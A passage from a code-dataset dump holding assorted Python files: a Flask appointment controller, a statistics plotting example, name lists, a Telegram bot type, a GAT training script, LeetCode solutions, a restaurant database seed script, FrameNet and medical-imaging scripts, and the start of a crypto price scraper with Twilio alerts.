0:\n return 'invalid time', 422\n\n new_appointment = {\n 'id': str(uuid.uuid4()),\n \"doctor id\": doctor_id,\n \"first Name\": first_name,\n \"last Name\": last_name,\n \"time\": time,\n \"kind\": kind\n }\n appointments = load_appointments_data()\n appointments.append(new_appointment)\n update_appointments_data(appointments)\n return new_appointment, 200\n","repo_name":"yuliwilliam/notable-health-backend","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19346970050","text":"import numpy as np\n\nnp.random.seed(18318) # get consistent random results\n\nN = 500 # total measurement count\nfrac_contaminated = 0.5 # fraction of sample that will be contaminated\n\n# symmetric, uncontaminated distribution\nmu = 0 \nsigma_uncontaminated = 1\nuncontaminated_samples = np.random.normal(mu, sigma_uncontaminated, \n int(N * (1 - frac_contaminated)))\n\n# symmetric, contaminated distribution\nsigma_contaminated = 5\ncontaminated_samples = np.random.normal(mu, sigma_contaminated, \n int(N * frac_contaminated))\n\n# create whole dataset\ndata = np.concatenate((uncontaminated_samples, contaminated_samples))\nnp.random.shuffle(data)\n\n# plot data\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\n\nydata = np.random.uniform(0, 1, N) # project randomly into 2D for better visualization\n\nax.plot(contaminated_samples, ydata[:int(N * frac_contaminated)], \"k.\", \n label=\"Pre-RCR dataset\", alpha=0.75, ms=4)\nax.plot(uncontaminated_samples, ydata[int(N * frac_contaminated):], \"k.\", \n alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()\n\n# get results pre-RCR\ncontaminated_mu = np.mean(data)\ncontaminated_sigma = np.std(data)\nprint(contaminated_mu, contaminated_sigma)\n\n# perform RCR\nimport rcr\n\n# initialize RCR with rejection technique:\n# (chosen from shape of uncontaminated + contaminated distribution)\nr = rcr.RCR(rcr.SS_MEDIAN_DL)\nr.performBulkRejection(data) # perform outlier rejection\n\n# View results post-RCR\ncleaned_mu = r.result.mu\ncleaned_sigma = r.result.stDev\nprint(cleaned_mu, cleaned_sigma)\n\n# plot rejections\ncleaned_data = r.result.cleanY\n\nflags = r.result.flags \n# list of booleans corresponding to the original dataset, \n# true if the corresponding datapoint is not an outlier.\n\ncleaned_data_indices = r.result.indices \n# indices of data in original dataset that are not outliers\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\nax.plot(data[cleaned_data_indices], ydata[cleaned_data_indices], \"b.\", \n label=\"RCR-accepted points\", alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()\n\n\n# Weighting Data:\n\nfrom scipy.stats import norm\n\ndef weight_data(datapoint):\n return norm.pdf(datapoint, loc=mu, scale=sigma_uncontaminated)\n\nweights = weight_data(data)\n\n# perform RCR\nr = rcr.RCR(rcr.SS_MEDIAN_DL)\nr.performBulkRejection(weights, data) # perform outlier rejection, now with weights\n\n\n# View results post-RCR\ncleaned_mu = r.result.mu\ncleaned_sigma = 
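# --- Illustrative sketch of the slot check used in book_appointment() above ---
# A timestamp is bookable only if it falls exactly on a 15-minute boundary;
# this helper is a standalone restatement of that rule, not project code.
from datetime import datetime

def on_quarter_hour(ts: float) -> bool:
    t = datetime.fromtimestamp(ts)
    return t.minute % 15 == 0 and t.second == 0 and t.microsecond == 0

print(on_quarter_hour(datetime(2024, 1, 1, 9, 15).timestamp()))  # True
print(on_quarter_hour(datetime(2024, 1, 1, 9, 20).timestamp()))  # False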
r.result.stDev\nprint(cleaned_mu, cleaned_sigma)\n\n\n# plot rejections\ncleaned_data = r.result.cleanY\ncleaned_data_indices = r.result.indices\n\nplt.figure(figsize=(8,5))\nax = plt.subplot(111)\nax.plot(data[cleaned_data_indices], ydata[cleaned_data_indices], \"b.\", \n label=\"RCR-accepted points,\\nwith weights applied to data\", alpha=0.75, ms=4)\n\nplt.xlim(-15, 15)\nplt.ylim(0, 1)\nplt.xlabel(\"data\")\nplt.yticks([])\n\nbox = ax.get_position()\nax.set_position([box.x0, box.y0, box.width * 0.65, box.height])\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\nplt.show()","repo_name":"nickk124/RCR","sub_path":"docs/source/examples/singlevalue/singlevalue.py","file_name":"singlevalue.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"71882612206","text":"male = [\n 'Santiago',\n 'Mateo',\n 'Diego',\n 'Miguel Ángel',\n 'Emiliano',\n 'Sebastián',\n 'Leonardo',\n 'José Ángel',\n 'Jesús',\n 'Alejandro',\n 'Luis Ángel',\n 'Daniel',\n 'Alexander',\n 'Juan Pablo',\n 'Gael',\n 'Fernando',\n 'Rodrigo',\n 'Matías',\n 'Emmanuel',\n 'Eduardo',\n 'Ángel Gabriel',\n 'David',\n 'Iker',\n 'Juan Carlos',\n 'Ángel',\n 'José Luis',\n 'Jonathan',\n 'Maximiliano',\n 'Ricardo',\n 'Alexis',\n 'José Manuel',\n 'Damián',\n 'Kevin',\n 'José Antonio',\n 'Gabriel',\n 'Luis Fernando',\n 'Cristian',\n 'Axel',\n 'Rafael',\n 'Marco Antonio',\n 'Alan',\n 'Isaac',\n 'Mauricio',\n 'Josue',\n 'José Miguel',\n 'Adrián',\n 'Uriel',\n 'Brayan',\n 'Samuel',\n 'José DeJesús',\n 'Juan Diego',\n 'Javier',\n 'Juan Manuel',\n 'Carlos',\n 'Francisco',\n 'Elías',\n 'Emilio',\n 'Brandon',\n 'Julio César',\n 'Nicolás',\n 'Juan José',\n 'Andrés',\n 'Aarón',\n 'Antonio',\n 'Tadeo',\n 'Leonel',\n 'Francisco Javier',\n 'Jesús Antonio',\n 'Carlos Daniel',\n 'Jesús Alejandro',\n 'José Eduardo',\n 'Gerardo',\n 'Iván',\n 'Abraham',\n 'Israel',\n 'Ángel De Jesús',\n 'Roberto',\n 'Miguel',\n 'Luis Antonio',\n 'Oscar',\n 'Erick',\n 'Omar',\n 'Víctor Manuel',\n 'Saúl',\n 'Jesús Eduardo',\n 'Ángel Daniel',\n 'Christopher',\n 'José María',\n 'Jorge',\n 'Dylan',\n 'Arturo',\n 'Ian',\n 'Juan Antonio',\n 'Emanuel',\n 'Bruno',\n 'Cristopher',\n 'César',\n 'Luis Enrique',\n 'Manuel',\n 'Pedro'\n]\n\nfemale = [\n 'Ximena',\n 'María José',\n 'Valentina',\n 'María Fernanda',\n 'Valeria',\n 'Sofía',\n 'Camila',\n 'Regina',\n 'Renata',\n 'Maria Guadalupe',\n 'Natalia',\n 'Daniela',\n 'Andrea',\n 'Victoria',\n 'Isabella',\n 'Samantha',\n 'Mariana',\n 'Fernanda',\n 'Fatima',\n 'Vanessa',\n 'Jimena',\n 'Dulce Maria',\n 'Alondra',\n 'Romina',\n 'Elizabeth',\n 'Alejandra',\n 'Nicole',\n 'Guadalupe',\n 'Melissa',\n 'Alexa',\n 'Esmeralda',\n 'AnaSofía',\n 'Kimberly',\n 'Evelyn',\n 'Abigail',\n 'Jennifer',\n 'Yamileth',\n 'Ana Victoria',\n 'Emily',\n 'Abril',\n 'Estefanía',\n 'Monserrat',\n 'Ximena Guadalupe',\n 'Paola',\n 'Miranda',\n 'Melany',\n 'Carolina',\n 'Paulina',\n 'Zoe',\n 'Gabriela',\n 'Liliana',\n 'Elisa',\n 'Itzel',\n 'Ivanna',\n 'Julieta',\n 'Jazmin',\n 'Alexandra',\n 'Yaretzi',\n 'Lizbeth',\n 'Marisol',\n 'Adriana',\n 'Naomi',\n 'Danna Paola',\n 'Rebeca',\n 'Diana',\n 'Mayte',\n 'Allison',\n 'Ana Paula',\n 'Luz Maria',\n 'Camila Guadalupe',\n 'Mía',\n 'Dayana',\n 'Wendy',\n 'Ana Karen',\n 'Michelle',\n 'Monserrat',\n 'Karla',\n 'Alexia',\n 'Yoselin',\n 'Lucero',\n 'Maria Del Carmen',\n 'Melanie',\n 'Valeria Guadalupe',\n 'Jaqueline',\n 'Aylin',\n 'Maria Alejandra',\n 'Danna Sofía',\n 'Estrella',\n 'Lucía',\n 'Maria De Jesús',\n 'Sarahi',\n 
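# --- Illustrative sketch (plain NumPy, deliberately not the rcr API) ---
# Why outlier rejection matters for the experiment above: with a 50%
# contaminated Gaussian mixture, the sample mean/std are inflated by the wide
# component, while median/MAD-based estimates are far less affected.
import numpy as np

rng = np.random.default_rng(0)
clean = rng.normal(0, 1, 250)
contaminated = rng.normal(0, 5, 250)
mixture = np.concatenate([clean, contaminated])

print(np.mean(mixture), np.std(mixture))     # std pulled well above 1
mad = np.median(np.abs(mixture - np.median(mixture)))
print(np.median(mixture), 1.4826 * mad)      # robust scale, markedly less inflated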
'Kenia',\n 'Tania',\n 'Luciana',\n 'Jocelyn',\n 'Maria Isabel',\n 'Ana Paola',\n 'Sofía Guadalupe',\n 'Sara',\n 'Jacqueline'\n]\n\nlast = [\n 'Hernandez',\n 'Garcia',\n 'Martinez',\n 'Lopez',\n 'Gonzalez',\n 'Perez',\n 'Rodriguez',\n 'Sanchez',\n 'Ramirez',\n 'Cruz',\n 'Flores',\n 'Gomez',\n 'Morales',\n 'Vazquez',\n 'Reyes',\n 'Jimenez',\n 'Torres',\n 'Diaz',\n 'Gutierrez',\n 'Ruiz',\n 'Mendoza',\n 'Aguilar',\n 'Ortiz',\n 'Moreno',\n 'Castillo',\n 'Romero',\n 'Alvarez',\n 'Mendez',\n 'Chavez',\n 'Rivera',\n 'Juarez',\n 'Ramos',\n 'Dominguez',\n 'Herrera',\n 'Medina',\n 'Castro',\n 'Vargas',\n 'Guzman',\n 'Velazquez',\n 'Muoz',\n 'Rojas',\n 'de La Cruz',\n 'Contreras',\n 'Salazar',\n 'Luna',\n 'Ortega',\n 'Santiago',\n 'Guerrero',\n 'Estrada',\n 'Bautista',\n 'Cortes',\n 'Soto',\n 'Alvarado',\n 'Espinoza',\n 'Lara',\n 'Avila',\n 'Rios',\n 'Cervantes',\n 'Silva',\n 'Delgado',\n 'Vega',\n 'Marquez',\n 'Sandoval',\n 'Carrillo',\n 'Fernandez',\n 'Leon',\n 'Mejia',\n 'Solis',\n 'Rosas',\n 'Ibarra',\n 'Valdez',\n 'Nuez',\n 'Campos',\n 'Santos',\n 'Camacho',\n 'Navarro',\n 'Maldonado',\n 'Rosales',\n 'Acosta',\n 'Pea',\n 'Miranda',\n 'Cabrera',\n 'Trejo',\n 'Valencia',\n 'Nava',\n 'Pacheco',\n 'Robles',\n 'Molina',\n 'Castaeda',\n 'Fuentes',\n 'Rangel',\n 'Huerta',\n 'Meza',\n 'Padilla',\n 'Espinosa',\n 'Aguirre',\n 'Salas',\n 'Cardenas',\n 'Orozco',\n 'Valenzuela',\n 'Ayala',\n 'Zuiga',\n 'Ochoa',\n 'Mora',\n 'Serrano',\n 'Salinas',\n 'Tapia',\n 'Olvera',\n 'Duran',\n 'Suarez',\n 'Macias',\n 'Zamora',\n 'Arellano',\n 'Calderon',\n 'Barrera',\n 'Villegas',\n 'Zavala',\n 'Gallegos',\n 'Lozano',\n 'Beltran',\n 'Velasco',\n 'Figueroa',\n 'Franco',\n 'Galvan',\n 'Montes',\n 'Sosa',\n 'Villanueva',\n 'Arias',\n 'Andrade',\n 'Antonio',\n 'Marin',\n 'Vasquez',\n 'Esquivel',\n 'Ponce',\n 'Corona',\n 'Garza',\n 'Alonso',\n 'Palacios',\n 'Trujillo',\n 'Bernal',\n 'Pineda',\n 'Rocha',\n 'Cortez',\n 'Rubio',\n 'Escobar',\n 'Galindo',\n 'Villa',\n 'de Jesus',\n 'Cano',\n 'Benitez',\n 'Cuevas',\n 'Bravo',\n 'Mata',\n 'Osorio',\n 'Carmona',\n 'Montoya',\n 'Enriquez',\n 'Rivas',\n 'Parra',\n 'Cisneros',\n 'Resendiz',\n 'Cordova',\n 'de La Rosa',\n 'Tellez',\n 'Vera',\n 'Tovar',\n 'Zarate',\n 'Leyva',\n 'Quintero',\n 'Quiroz',\n 'Salgado',\n 'Becerra',\n 'Arroyo',\n 'Peralta',\n 'Esparza',\n 'Avalos',\n 'Roman',\n 'Barajas',\n 'Felix',\n 'Guevara',\n 'Murillo',\n 'Olivares',\n 'de Leon',\n 'Castellanos',\n 'Villarreal',\n 'Lugo',\n 'Montiel',\n 'Angeles',\n 'Villalobos',\n 'Segura',\n 'Saucedo',\n 'Gallardo',\n 'Chan',\n 'Reyna',\n 'Mercado',\n 'Davila',\n 'Navarrete',\n 'Paredes',\n 'Magaa',\n 'Guerra'\n]\n","repo_name":"xioren/JohnDoe","sub_path":"john_doe/names/mexico.py","file_name":"mexico.py","file_ext":"py","file_size_in_byte":6143,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9692263968","text":"from ..base import InlineQueryResult, Field, InputMessageContent\n\nfrom ..inline_keyboard_markup import InlineKeyboardMarkup\n\n\nclass InlineQueryResultVoice(InlineQueryResult):\n\n voice_url = Field()\n title = Field()\n caption = Field()\n parse_mode = Field()\n voice_duration = Field()\n reply_markup = Field()\n input_message_content = Field()\n\n def __init__(self,\n id: str,\n voice_url: str,\n title: str,\n caption: str = None,\n parse_mode: str = None,\n voice_duration: int = None,\n reply_markup: InlineKeyboardMarkup = None,\n input_message_content: InputMessageContent = None\n ):\n super().__init__(id, 'voice')\n\n self.voice_url = \\\n 
Field(voice_url, [str])\n\n self.title = \\\n Field(title, [str])\n\n self.caption = \\\n Field(caption, [str])\n\n self.parse_mode = \\\n Field(parse_mode, [str])\n\n self.voice_duration = \\\n Field(voice_duration, [int])\n\n self.reply_markup = \\\n Field(reply_markup, [InlineKeyboardMarkup])\n\n self.input_message_content = \\\n Field(input_message_content, [InputMessageContent])\n","repo_name":"cmd410/OrigamiBot","sub_path":"origamibot/core/teletypes/inline_query_result/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"2"} +{"seq_id":"10274982710","text":"# from torch_geometric.data import DataLoader, Dataset, Data\n\n# from torchvision.transforms import ToTensor\n# import networkx as nx\n# import numpy as np\n# import torch\n# import cv2\n\n# class SIFTGraphDataset(Dataset):\n# def __init__(self, img_paths, labels):\n# self.img_paths = img_paths\n# self.labels = labels\n# self.transforms = ToTensor()\n\n# def __getitem__(self, idx):\n# # Load image\n# img_path = self.img_paths[idx]\n# img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n\n# # Extract SIFT features\n# sift = cv2.SIFT_create()\n# kp, des = sift.detectAndCompute(img, None)\n\n# # Create graph and add nodes\n# G = nx.Graph()\n# for i in range(len(kp)):\n# G.add_node(i, pos=(kp[i].pt[0], kp[i].pt[1]), img=idx, features=des[i])\n\n# # Add edges\n# if idx == 0:\n# # For the first image, add self-loops\n# for i in range(len(kp)):\n# G.add_edge(i, i)\n# else:\n# # For other images, match features with the first image\n# img1 = cv2.imread(self.img_paths[0], cv2.IMREAD_GRAYSCALE)\n# kp1, des1 = sift.detectAndCompute(img1, None)\n# bf = cv2.BFMatcher(cv2.NORM_L2, crossCheck=True)\n# matches = bf.match(des, des1)\n# matches = sorted(matches, key=lambda x:x.distance)\n# k = min(50, len(matches))\n# matches = matches[:k]\n# for match in matches:\n# i1 = match.queryIdx\n# i2 = match.trainIdx\n# G.add_edge(i1, i2)\n\n# # Convert to adjacency matrix\n# A = nx.adjacency_matrix(G)\n\n# # Convert to tensor\n# A = torch.tensor(A.todense())\n\n# # Get node features\n# node_features = []\n# for node in G.nodes():\n# node_features.append(G.nodes[node]['features'])\n# node_features = torch.tensor(node_features)\n\n# # Get node positions\n# node_positions = []\n# for node in G.nodes():\n# node_positions.append(G.nodes[node]['pos'])\n# node_positions = torch.tensor(node_positions)\n\n# edge_index = torch.tensor(np.array(A.nonzero()), dtype=torch.long)\n\n\n# # Create PyTorch geometric data object\n# data = Data(x=node_features.float(), pos=node_positions.float(), edge_index=edge_index, edge_attr=None)\n\n# # Normalize node positions to be in [-1,1] range\n# data.pos = (data.pos - data.pos.min(dim=0).values) / (data.pos.max(dim=0).values - data.pos.min(dim=0).values) * 2 - 1\n\n# # Apply transforms to data\n# data = self.transforms(data)\n\n# # Get label\n# label = torch.tensor(self.labels[idx])\n\n# return data, label\n\n# def __len__(self):\n# return len(self.img_paths)\n\n\n############################################################3\n\nimport torch\nimport torch.optim as optim\nfrom sklearn.metrics import f1_score\n\ndef train(model, optimizer, criterion, features, adj, labels, idx_train, idx_val, epochs):\n for epoch in range(epochs):\n model.train()\n optimizer.zero_grad()\n output = model(features, adj)\n loss = criterion(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n\n train_loss = 
loss.item()\n val_loss, val_acc, val_f1 = evaluate(model, criterion, features, adj, labels, idx_val)\n print(\"Epoch [{}/{}], Train Loss: {:.4f}, Val Loss: {:.4f}, Val Acc: {:.4f}, Val F1: {:.4f}\"\n .format(epoch+1, epochs, train_loss, val_loss, val_acc, val_f1))\n\ndef evaluate(model, criterion, features, adj, labels, idx_val):\n model.eval()\n with torch.no_grad():\n output = model(features, adj)\n loss = criterion(output[idx_val], labels[idx_val])\n preds = output.argmax(dim=1)\n acc = (preds[idx_val] == labels[idx_val]).sum().item() / idx_val.shape[0]\n f1 = f1_score(labels[idx_val].cpu().numpy(), preds[idx_val].cpu().numpy(), average='micro')\n return loss.item(), acc, f1\n\n# Training hyperparameters\nlr = 0.005\nweight_decay = 5e-4\nn_epochs = 200\npatience = 20\n\n# Create the GAT model\nnfeat = features.shape[1]\nnhid = 8\nnclass = labels.max().item() + 1\ndropout = 0.6\nalpha = 0.2\nnheads = 8\n\nmodel = GAT(nfeat, nhid, nclass, dropout, alpha, nheads)\n\n# Create optimizer and loss function\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\ncriterion = nn.CrossEntropyLoss()\n\n# Train the model\ntrain(model, optimizer, criterion, features, adj, labels, idx_train, idx_val, n_epochs)\n","repo_name":"NMMallick/GAT-Feature-Matching","sub_path":"scripts/TrainModel.py","file_name":"TrainModel.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26726947388","text":"# 49: Group Anagrams\n# https://leetcode.com/problems/group-anagrams/\n\nfrom collections import defaultdict\n\nclass Solution:\n def groupAnagrams(self, strs: list[str]) -> list[list[str]]:\n tmap = defaultdict(list)\n \n for s in strs:\n tmap[str(sorted(s))].append(s)\n \n return list(tmap.values())\n\n\nif __name__ == \"__main__\":\n o = Solution()\n\n # INPUT\n strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\n\n # OUTPUT\n result = o.groupAnagrams(strs)\n print(result)\n","repo_name":"poseidon-code/NeetCode-Solutions","sub_path":"01-arrays_&_hashing/00049-Group_Anagrams/00049-group_anagrams.py","file_name":"00049-group_anagrams.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"3281047265","text":"class Solution:\n def nextGreaterElements(self, nums: List[int]) -> List[int]:\n length = len(nums)\n nums.extend(nums[:])\n stack, res = [], [-1] * len(nums)\n for index, num in enumerate(nums):\n while stack and num > stack[-1][1]:\n i, n = stack.pop()\n res[i] = num\n stack.append((index, num))\n return res[:length]\n","repo_name":"pqnguyen/CompetitiveProgramming","sub_path":"platforms/leetcode/NextGreaterElementII.py","file_name":"NextGreaterElementII.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71050059886","text":"from typing import List\nclass Solution:\n # 使用回溯的方法\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = [[]]\n l = len(nums)\n def dep(temp=[],index=0):\n for i in range(index,l):\n temp.append(nums[i])\n ans.append(temp[:])\n dep(temp,i+1)\n temp.pop()\n dep()\n return ans\n # 使用的集合的方式\n def subsets_1(self, nums: List[int]) -> List[List[int]]:\n ans = [[]]\n for i in nums:\n ans += [j+[i] for j in ans]\n return ans\n\ns 
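# --- Illustrative sketch: wiring up the unused `patience` hyperparameter ---
# The training script above defines patience = 20 but never early-stops (and
# it assumes GAT, features, adj, labels and idx_* are defined elsewhere).
# A minimal patience rule over per-epoch validation losses:
def should_stop(val_losses, patience):
    # stop when the best value has not improved for `patience` epochs
    best_epoch = min(range(len(val_losses)), key=val_losses.__getitem__)
    return len(val_losses) - 1 - best_epoch >= patience

history = [1.0, 0.8, 0.7, 0.71, 0.72, 0.73]
print(should_stop(history, patience=3))  # True: no improvement for 3 epochs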
=Solution()\nprint(s.subsets_1([1,2,3]))","repo_name":"elfisworking/PY_Leet","sub_path":"leetcode_python/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24005033230","text":"from main.models.item import Item\nfrom main.models.tag import Tag\nfrom main.models.order import Order, LineItem\nfrom main.models._db import db\nfrom app import App\n\napp = App()\n\n# 生成假資料\nfake_items = [\n Item(name=\"青椒\", price=20, unit=\"個\", tag_id=1),\n Item(name=\"香菇\", price=15, unit=\"個\", tag_id=1),\n Item(name=\"杏鮑菇\", price=15, unit=\"個\", tag_id=1),\n Item(name=\"大根(白蘿蔔)\", price=20, unit=\"個\", tag_id=1),\n Item(name=\"玉米筍(4支)\", price=20, unit=\"籃\", tag_id=1),\n Item(name=\"娃娃菜\", price=20, unit=\"把\", tag_id=1),\n Item(name=\"高麗菜\", price=30, unit=\"籃\", tag_id=1),\n Item(name=\"手工黑輪\", price=10, unit=\"個\", tag_id=2),\n Item(name=\"米血\", price=10, unit=\"個\", tag_id=2),\n Item(name=\"貢丸\", price=10, unit=\"顆\", tag_id=2),\n Item(name=\"龍蝦沙拉丸\", price=10, unit=\"顆\", tag_id=2),\n Item(name=\"魚包蛋\", price=15, unit=\"顆\", tag_id=2),\n Item(name=\"北海貝\", price=15, unit=\"個\", tag_id=2),\n Item(name=\"魚豆腐(2個)\", price=15, unit=\"籃\", tag_id=2),\n Item(name=\"百頁豆腐\", price=15, unit=\"個\", tag_id=2),\n Item(name=\"油豆腐\", price=20, unit=\"個\", tag_id=2),\n Item(name=\"鳥蛋\", price=20, unit=\"顆\", tag_id=2),\n Item(name=\"手工高麗菜捲\", price=20, unit=\"捲\", tag_id=2),\n Item(name=\"豬肉片\", price=20, unit=\"串\", tag_id=2),\n Item(name=\"牛肉片\", price=25, unit=\"串\", tag_id=2),\n Item(name=\"石斑魚條\", price=25, unit=\"串\", tag_id=2),\n Item(name=\"王子麵\", price=15, unit=\"包\", tag_id=3),\n Item(name=\"意麵\", price=15, unit=\"包\", tag_id=3),\n Item(name=\"烏龍麵\", price=20, unit=\"包\", tag_id=3),\n Item(name=\"荷包蛋\", price=20, unit=\"個\", tag_id=3),\n Item(name=\"蔥蛋\", price=25, unit=\"個\", tag_id=3),\n Item(name=\"可口可樂\", price=25, unit=\"瓶\", tag_id=4),\n Item(name=\"雪碧\", price=25, unit=\"瓶\", tag_id=4),\n Item(name=\"蘋果汁\", price=25, unit=\"罐\", tag_id=4),\n Item(name=\"檸檬風味茶\", price=25, unit=\"罐\", tag_id=4)\n]\nfake_tags = [Tag(name=\"季節時蔬\"), Tag(name=\"關東煮\"),Tag(name=\"主食類/其他\"),Tag(name=\"飲品\")]\n\nlineitem1 = [\n LineItem(amount=3, item_id=1, name=\"青椒\", price=20, unit=\"個\"),\n LineItem(amount=1, item_id=22, name=\"王子麵\", price=20, unit=\"包\"),\n]\nlineitem2 = [\n LineItem(amount=2, item_id=1, name=\"青椒\", price=20, unit=\"個\"),\n LineItem(amount=4, item_id=27, name=\"可口可樂\", price=30, unit=\"瓶\"),\n]\n\norder1 = Order(username=\"cloudy\", lineitems=lineitem1)\norder2 = Order(username=\"sunny\", lineitems=lineitem2)\n\norder1.lineitems = lineitem1\norder2.lineitems = lineitem2\n\nfake_orders = [order1, order2]\n\nwith app.app_context():\n for item in fake_items:\n db.session.add(item)\n\n for tag in fake_tags:\n db.session.add(tag)\n\n for order in fake_orders:\n db.session.add(order)\n\n for lineitem in lineitem1 + lineitem2:\n db.session.add(lineitem)\n\n db.session.commit()\n","repo_name":"cloudy9982/Hot-Pot-Ingredients-Inventory-Management-System","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26455679717","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 8 17:09 2019\n\n@author: sanaz\nThis Modul searches for the frames with semantic type ['Positive_judgment', 'End_of_scale', 'Negative', 
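# --- Illustrative alternative (not from the solutions above) ---
# The iterative `ans += [j + [i] for j in ans]` doubling trick has a bitmask
# twin: each of the 2**n masks selects one subset directly.
def subsets_bitmask(nums):
    n = len(nums)
    return [[nums[i] for i in range(n) if mask >> i & 1] for mask in range(1 << n)]

print(subsets_bitmask([1, 2, 3]))  # 8 subsets, [] first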
'Negative_judgment'] in FrameNet. \n\"\"\"\nfrom nltk.corpus import framenet as fn\nimport json\n\n# input\nSEM_TYPES = './senti_semantic_types.txt'\nOUTPUT = './frames_by_semtypes.json'\n\nwith open(SEM_TYPES,'r') as f:\n sem_types = [line.strip() for line in f.readlines()]\n# all frame in FrameNet \nframes = fn.frames()\n\nframe_dict = {sem_type:[] for sem_type in sem_types}\n# iterate over frames in FrameNet \nfor frame in frames:\n\t# iterate over semantic type in frame with semantic type \n for sem_type in frame.semTypes:\n\t\t# if this semantic type in frame.sem_types \n if sem_type.name in sem_types:\n\t # print frame and frame ID with semantic type from input into frame_dict \n # print(frame.name, frame.ID)\n frame_dict[sem_type.name].append({'frame_name': frame.name, 'frame_id': frame.ID})\n# write to the OUTPUT\nwith open(OUTPUT, 'w') as f:\n json.dump(frame_dict, f)\n \n#print(frame_dict)\n\n","repo_name":"NadiaWahida/framenet_extension","sub_path":"FrameNetAnalyse/Code/get_frames_by_semType.py","file_name":"get_frames_by_semType.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7511419101","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # FeTS Challenge\n# \n# Contributing Authors (alphabetical order):\n# - Brandon Edwards (Intel)\n# - Patrick Foley (Intel)\n# - Micah Sheller (Intel)\n\nfrom fets_challenge import model_outputs_to_disc\nfrom pathlib import Path\nimport os\nfrom sys import path\nfrom fets_challenge.gandlf_csv_adapter import construct_fedsim_csv, extract_csv_partitions\n\ndevice='cpu'\n\n# infer participant home folder\nhome = str(Path.home())\n\n# you will need to specify the correct experiment folder and the parent directory for\n# the data you want to run inference over\ncheckpoint_folder='experiment_1'\n#data_path = \ndata_path = '/raid/datasets/FeTS22/MICCAI_FeTS2022_ValidationData'\n\n# you can keep these the same if you wish\nbest_model_path = os.path.join(home, '.local/workspace/checkpoint', checkpoint_folder, 'best_model.pkl')\noutputs_path = os.path.join(home, '.local/workspace/checkpoint', checkpoint_folder, 'model_outputs')\n\nvalidation_csv_filename='validation.csv'\n\n\n# Using this best model, we can now produce NIfTI files for model outputs \n# using a provided data directory\n\nmodel_outputs_to_disc(data_path=data_path, \n validation_csv=validation_csv_filename,\n output_path=outputs_path, \n native_model_path=best_model_path,\n outputtag='',\n device=device)\n","repo_name":"FeTS-AI/Challenge","sub_path":"Task_1/generate_predictions.py","file_name":"generate_predictions.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"2"} +{"seq_id":"2281887027","text":"\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen, Request\nfrom datetime import datetime\nimport keys2\n\nfrom twilio.rest import Client\n\nclient=Client(keys2.accountSID, keys2.authToken)\n\nTwilioNumber='+18585445760'\nmyCellPhone='+18327767907'\n\n\nurl = 'https://crypto.com/price'\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\nreq= Request(url, headers=headers)\nwebpage=urlopen(req).read()\nsoup=BeautifulSoup(webpage,'html.parser')\n\nrank=0\nrows=soup.findAll('tr')\nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\")\nprint(\"TOP 5 
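# --- Illustrative sketch (same nltk.corpus.framenet API as the record above) ---
# A reverse tally: how many frames carry each semantic type. Requires the
# FrameNet corpus to be installed, e.g. nltk.download('framenet_v17');
# iterating all frames is slow, so this is exploration code only.
from collections import Counter
from nltk.corpus import framenet as fn

type_counts = Counter(st.name for frame in fn.frames() for st in frame.semTypes)
print(type_counts.most_common(5))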
